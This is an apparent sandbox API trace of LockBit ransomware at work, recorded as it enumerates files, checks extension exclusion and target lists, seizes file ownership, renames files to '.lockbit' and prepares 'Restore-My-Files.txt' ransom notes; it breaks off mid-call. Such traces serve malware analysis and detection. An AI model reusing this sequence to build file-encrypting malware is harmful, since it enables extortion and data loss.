lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.560] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.560] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.560] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png.lockbit") returned 81 [0079.561] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.565] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.565] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.565] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.565] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.565] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.565] RtlFreeAnsiString (AnsiString="\\") [0079.565] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0079.565] malloc (_Size=0x200) returned 0x77d800 [0079.566] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.566] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.566] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.566] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.567] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.567] CloseHandle (hObject=0x3bc) returned 1 [0079.567] free (_Block=0x77d800) [0079.567] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.567] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.567] malloc (_Size=0x40068) returned 0x3df0008 [0079.567] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3525) returned 1 [0079.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0079.568] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0079.569] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0079.572] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.572] malloc (_Size=0xb8) returned 0x1ff1e60 [0079.572] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0079.573] free (_Block=0x1ff1e60) [0079.573] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.573] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.573] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.573] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729af85a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729af85a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0079.573] lstrcmpiW (lpString1=".", lpString2="btn-next-static.png") returned -1 [0079.573] lstrcmpiW (lpString1="..", lpString2="btn-next-static.png") returned -1 [0079.573] PathFindExtensionW (pszPath="btn-next-static.png") returned=".png" [0079.573] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.573] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.573] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.574] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.574] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.574] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.574] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.575] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.575] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-next-static.png") returned 1 [0079.576] lstrcmpiW (lpString1="ntldr", lpString2="btn-next-static.png") returned 1 [0079.576] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-next-static.png") returned 1 [0079.576] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-next-static.png") returned -1 [0079.576] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-next-static.png") returned -1 [0079.576] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-next-static.png") returned 1 [0079.576] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-next-static.png") returned 1 [0079.576] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.576] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned=".png" [0079.576] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.576] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.576] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.576] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.577] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.577] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.577] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.577] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.577] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.577] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.577] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.577] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.577] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png.lockbit") returned 81 [0079.577] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.578] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.578] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.578] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.578] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.579] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.579] RtlFreeAnsiString (AnsiString="\\") [0079.579] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0079.579] malloc (_Size=0x200) returned 0x77d800 [0079.579] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.579] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.579] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.579] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.580] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.580] CloseHandle (hObject=0x3ac) returned 1 [0079.580] free (_Block=0x77d800) [0079.580] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0079.580] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.580] malloc (_Size=0x40068) returned 0x3d70048 [0079.581] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3580) returned 1 [0079.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0079.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0079.583] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0079.589] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.589] malloc (_Size=0xb8) returned 0x1ff1e60 [0079.589] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0079.589] free (_Block=0x1ff1e60) [0079.589] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.589] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.589] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.590] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xe0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0079.590] lstrcmpiW (lpString1=".", lpString2="btn-previous-static.png") returned -1 [0079.590] lstrcmpiW (lpString1="..", lpString2="btn-previous-static.png") returned -1 [0079.590] PathFindExtensionW (pszPath="btn-previous-static.png") returned=".png" [0079.590] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.590] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.590] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.591] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.591] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.591] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.591] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.591] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.591] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.591] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.591] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.592] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.592] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.592] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.592] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-previous-static.png") returned 1 [0079.592] lstrcmpiW (lpString1="ntldr", lpString2="btn-previous-static.png") returned 1 [0079.592] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-previous-static.png") returned 1 [0079.592] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-previous-static.png") returned -1 [0079.592] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-previous-static.png") returned -1 [0079.592] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-previous-static.png") returned 1 [0079.592] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-previous-static.png") returned 1 [0079.592] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.593] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned=".png" [0079.593] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.593] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.593] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.593] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.594] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.594] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.594] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.594] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.594] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.594] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.594] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.594] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.594] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.594] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png.lockbit") returned 85 [0079.594] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.595] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.595] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.595] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.595] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.595] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.596] RtlFreeAnsiString (AnsiString="\\") [0079.596] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0079.596] malloc (_Size=0x200) returned 0x77d800 [0079.596] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.596] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.596] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, 